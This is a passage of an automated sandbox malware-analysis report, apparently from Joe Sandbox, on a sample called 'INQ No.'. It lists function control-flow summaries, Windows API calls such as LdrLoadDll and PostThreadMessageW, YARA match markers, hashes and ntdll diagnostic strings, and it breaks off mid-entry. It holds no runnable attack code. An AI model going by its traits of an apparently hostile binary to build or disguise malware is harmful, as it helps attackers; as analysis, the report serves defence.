                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 333 417673-41769c call 42de13 336 4176a2-4176b0 call 42e333 333->336 337 41769e-4176a1 333->337 340 4176c0-4176d1 call 42c7e3 336->340 341 4176b2-4176bd call 42e5d3 336->341 346 4176d3-4176e7 LdrLoadDll 340->346 347 4176ea-4176ed 340->347 341->340 346->347
                                                                                                                                                                            APIs
                                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                                            • Opcode ID: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                                                                                                            • Instruction ID: 63ddb307992d993e20b5758824dbbb23b6c5c0d885c371cecfd37f145fc1fc2a
                                                                                                                                                                            • Opcode Fuzzy Hash: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                                                                                                            • Instruction Fuzzy Hash: 48011EB5E4020DABDF10DAE5DC42FDEB7789B54308F0081AAE90897240FA35EB548B95
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 0042B233 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 353 42b233-42b26f call 404933 call 42c2f3 NtClose
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                                                            • Opcode ID: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                                                            • Instruction ID: da727019d85e71b4f98dc3c04865d8d3d54acb7ac2c2c1eb56f854e5711b10c9
                                                                                                                                                                            • Opcode Fuzzy Hash: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                                                            • Instruction Fuzzy Hash: CCE04676640214BBC220AAAADC41FAB776CEFC6714F00402AFA0CA7242C6B4B90187F5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F12B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 367 f12b60-f12b6c LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: db0678886d2d7e334068a7f1a71ee9f502844d9fffeddeb44a35f88c79e50b4e
                                                                                                                                                                            • Instruction ID: 875d362c87fd8d9a7b4f4c04454788b6a3bd512c33854604d1214dac4b5c2cdf
                                                                                                                                                                            • Opcode Fuzzy Hash: db0678886d2d7e334068a7f1a71ee9f502844d9fffeddeb44a35f88c79e50b4e
                                                                                                                                                                            • Instruction Fuzzy Hash: 8090026120341013420571589415616400A87E0341B55C032E1014590ECD2989927525
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F12C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 368 f12c70-f12c7c LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: e936d8e2d771a867bbcf9887bc7ca7c756d15312d3076ff8b4b15c7abe5e8ac3
                                                                                                                                                                            • Instruction ID: a36399d60a15e4c38958576da2c8d95adee6a2cb94c6e5a6380e27cbc57ab5b4
                                                                                                                                                                            • Opcode Fuzzy Hash: e936d8e2d771a867bbcf9887bc7ca7c756d15312d3076ff8b4b15c7abe5e8ac3
                                                                                                                                                                            • Instruction Fuzzy Hash: D290023120349812D2107158D40574A000587D0341F59C422A4424658E8E9989927521
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F12DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 369 f12df0-f12dfc LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 85ad592afedd53611fb87e434041ba06a5416e8c28883a9f7340966b652fcde4
                                                                                                                                                                            • Instruction ID: 6ee18916828ffd9039970db5136ce052c65f23e89149c53cb9c47894a1143ae3
                                                                                                                                                                            • Opcode Fuzzy Hash: 85ad592afedd53611fb87e434041ba06a5416e8c28883a9f7340966b652fcde4
                                                                                                                                                                            • Instruction Fuzzy Hash: 5E90023120341423D21171589505707000987D0381F95C423A0424558E9E5A8A53B521
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 64ba3ae21168b062692b825eb1e34e26462a2fe544534ad543427fc80ac6423e
                                                                                                                                                                            • Instruction ID: 715f8cc5ef00c30b5769f217f3575f2c9cdb16562d9748a547b88cd6dae34027
                                                                                                                                                                            • Opcode Fuzzy Hash: 64ba3ae21168b062692b825eb1e34e26462a2fe544534ad543427fc80ac6423e
                                                                                                                                                                            • Instruction Fuzzy Hash: D090023160751412D20071589515706100587D0341F65C422A0424568E8F998A5279A2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00413C6C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                            • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                            • API String ID: 1836367815-224894077
                                                                                                                                                                            • Opcode ID: f5e35cfe8e6516f02c30a3443cc0ee0ee5b1e7cc6392967cd808f54fb56ba87c
                                                                                                                                                                            • Instruction ID: 5a9376cf19c71376eb6dcd9ad07240282008403dba884ccb0a10c61fd27c35d5
                                                                                                                                                                            • Opcode Fuzzy Hash: f5e35cfe8e6516f02c30a3443cc0ee0ee5b1e7cc6392967cd808f54fb56ba87c
                                                                                                                                                                            • Instruction Fuzzy Hash: 1B114872D0415C7AEB10ABE59C82DEFBB7CDF406A8F048069FE1077141D5685F0687E5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00413C73 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                            • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                            • API String ID: 1836367815-224894077
                                                                                                                                                                            • Opcode ID: 6288d2ea1272a214756263fac976e8fff6842ae45e043216bf19d7adf1833ff7
                                                                                                                                                                            • Instruction ID: 4273e9db8a055284bf7aad7e038a2b9a4781de0a78bbed76330aa2944e199f6c
                                                                                                                                                                            • Opcode Fuzzy Hash: 6288d2ea1272a214756263fac976e8fff6842ae45e043216bf19d7adf1833ff7
                                                                                                                                                                            • Instruction Fuzzy Hash: CC0104B2D0011C7AEB10ABE59C82DEFBB7CDF40698F058069FA14B7241D5685F068BE5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 0042B5A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 38 42b5a3-42b5e4 call 404933 call 42c2f3 RtlFreeHeap
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B5DF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                            • String ID: !dA
                                                                                                                                                                            • API String ID: 3298025750-3330550368
                                                                                                                                                                            • Opcode ID: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                                                            • Instruction ID: 28da6497efbab91fddcaddee6dcc59dcba5a5150a74096bf66e05214206e21d5
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                                                            • Instruction Fuzzy Hash: A4E06DB2640208BBD610EE99DC41EAB33ACEFCA710F000019F909A7242C670B9108AB9
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 0042B553 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 348 42b553-42b597 call 404933 call 42c2f3 RtlAllocateHeap
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,0041DEAB,?,?,00000000,?,0041DEAB,?,?,?), ref: 0042B592
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                            • Opcode ID: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                                                            • Instruction ID: 1e45151d5ae518e03348f57204b76deaae3a37f6371d957f2058fa57962241ea
                                                                                                                                                                            • Opcode Fuzzy Hash: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                                                            • Instruction Fuzzy Hash: A8E06DB1604244BBD614EE99DC41EAF37ACEFC6710F000019F908A7242C670B91086B9
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 0042B5F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 358 42b5f3-42b62f call 404933 call 42c2f3 ExitProcess
                                                                                                                                                                            APIs
                                                                                                                                                                            • ExitProcess.KERNEL32(?,00000000,?,?,A337B7DB,?,?,A337B7DB), ref: 0042B62A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                            • Opcode ID: 2759363570b55ec80a9c2bbdb714e3a733575c6f342d5e77988da5f6202b6134
                                                                                                                                                                            • Instruction ID: 5260f22870e994c6374de7522158ff438fff32bc85833648b073e817e0388f48
                                                                                                                                                                            • Opcode Fuzzy Hash: 2759363570b55ec80a9c2bbdb714e3a733575c6f342d5e77988da5f6202b6134
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EE04F72600214BBD220AA6ADC41F9B775CDFC5714F004469FA0CA7246CAB5B90186B4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F12C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 363 f12c0a-f12c0f 364 f12c11-f12c18 363->364 365 f12c1f-f12c26 LdrInitializeThunk 363->365
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 04031223b56f5db5734f71ceb30b3597986d6889d4212fe1d5bb01dcf2e5ea3f
                                                                                                                                                                            • Instruction ID: 1a04a3be0ad726aeee25df2e1b2946654b439bdb9f31a3bb6173b3c4c5a8278d
                                                                                                                                                                            • Opcode Fuzzy Hash: 04031223b56f5db5734f71ceb30b3597986d6889d4212fe1d5bb01dcf2e5ea3f
                                                                                                                                                                            • Instruction Fuzzy Hash: A3B09B71D035D5D6DB51E760560971B790067E0751F15C072D3030641F4B3CC5D1F5B5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 00F52349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-2160512332
                                                                                                                                                                            • Opcode ID: 946d518f4a8d4632be05eed87429b02ced2634cc471fbd75863e9538265087e7
                                                                                                                                                                            • Instruction ID: 03f5f1152c1f4504b1d897eb742d393a3a1033258d3603b7fbf568ef2a5dd8a4
                                                                                                                                                                            • Opcode Fuzzy Hash: 946d518f4a8d4632be05eed87429b02ced2634cc471fbd75863e9538265087e7
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C92CE71A08341AFD760CF24C881F6BB7E8BB85761F044A1DFA84D7291D770E948EB92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F08620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • Critical section address, xrefs: 00F45425, 00F454BC, 00F45534
                                                                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F4540A, 00F45496, 00F45519
                                                                                                                                                                            • Invalid debug info address of this critical section, xrefs: 00F454B6
                                                                                                                                                                            • double initialized or corrupted critical section, xrefs: 00F45508
                                                                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 00F45543
                                                                                                                                                                            • Critical section address., xrefs: 00F45502
                                                                                                                                                                            • corrupted critical section, xrefs: 00F454C2
                                                                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F454CE
                                                                                                                                                                            • Address of the debug info found in the active list., xrefs: 00F454AE, 00F454FA
                                                                                                                                                                            • Critical section debug info address, xrefs: 00F4541F, 00F4552E
                                                                                                                                                                            • 8, xrefs: 00F452E3
                                                                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F454E2
                                                                                                                                                                            • Thread identifier, xrefs: 00F4553A
                                                                                                                                                                            • undeleted critical section in freed memory, xrefs: 00F4542B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                            • API String ID: 0-2368682639
                                                                                                                                                                            • Opcode ID: ad640a07dbfa12f1620071c6b81fd389b4ee7452d152fbb8262cd5c0e39d87ad
                                                                                                                                                                            • Instruction ID: b8e993c0032b2e73845f30251116b1f9a855353fb412fa164c66852ce9ff010f
                                                                                                                                                                            • Opcode Fuzzy Hash: ad640a07dbfa12f1620071c6b81fd389b4ee7452d152fbb8262cd5c0e39d87ad
                                                                                                                                                                            • Instruction Fuzzy Hash: F4818AB1A00758AFDB20DF94C941FAEBBF9AB08B14F244119F905B7281D7B5AD41EB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00F42498
                                                                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00F42506
                                                                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00F425EB
                                                                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00F42409
                                                                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00F42602
                                                                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00F42624
                                                                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00F42412
                                                                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00F424C0
                                                                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 00F4261F
                                                                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00F422E4
                                                                                                                                                                            • @, xrefs: 00F4259B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                            • API String ID: 0-4009184096
                                                                                                                                                                            • Opcode ID: f85cb58b11c9b00faedba6ed3fb114b0c43174689d84c26c8f1cb1d3385b8426
                                                                                                                                                                            • Instruction ID: 17acde606a980c57213526f500178cb285791aa540b1c3705cbeb2b6e827955f
                                                                                                                                                                            • Opcode Fuzzy Hash: f85cb58b11c9b00faedba6ed3fb114b0c43174689d84c26c8f1cb1d3385b8426
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A0262F2D002289BDB61DB14CD85BEDB7B8AB44314F4041E9BA49B7281D7349F84EF69
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F78B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                            • API String ID: 0-2515994595
                                                                                                                                                                            • Opcode ID: cb4d2abe8f1a2559969f813addd64f4edef7b5b4af908f7c593314661f5f725b
                                                                                                                                                                            • Instruction ID: 036ce74d5fe906f7d85bc0a812767a4e4272d6abcaa59af072d9fedd2ed59380
                                                                                                                                                                            • Opcode Fuzzy Hash: cb4d2abe8f1a2559969f813addd64f4edef7b5b4af908f7c593314661f5f725b
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F51D3719483119BC325DF149C49BABBBE8EFC8390F14851EB89887280EB74D506E7A2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00F80274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                            • API String ID: 0-1700792311
                                                                                                                                                                            • Opcode ID: 9c6bac47e5383ed3c47edf0cc15115528e21c184d1314208bf8a44c4c902fac2
                                                                                                                                                                            • Instruction ID: 28aabbd2bfa4de29290a33c7916349249ecaca1b6cc79684570bfedb99a90584
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c6bac47e5383ed3c47edf0cc15115528e21c184d1314208bf8a44c4c902fac2
                                                                                                                                                                            • Instruction Fuzzy Hash: 4CD11331900685DFCB51EF68C852BEDBBF1FF4A720F488059E445AB262DB35E945EB20
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 00EDEA80 Relevance: 9.8, Strings: 7, Instructions: 1073COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
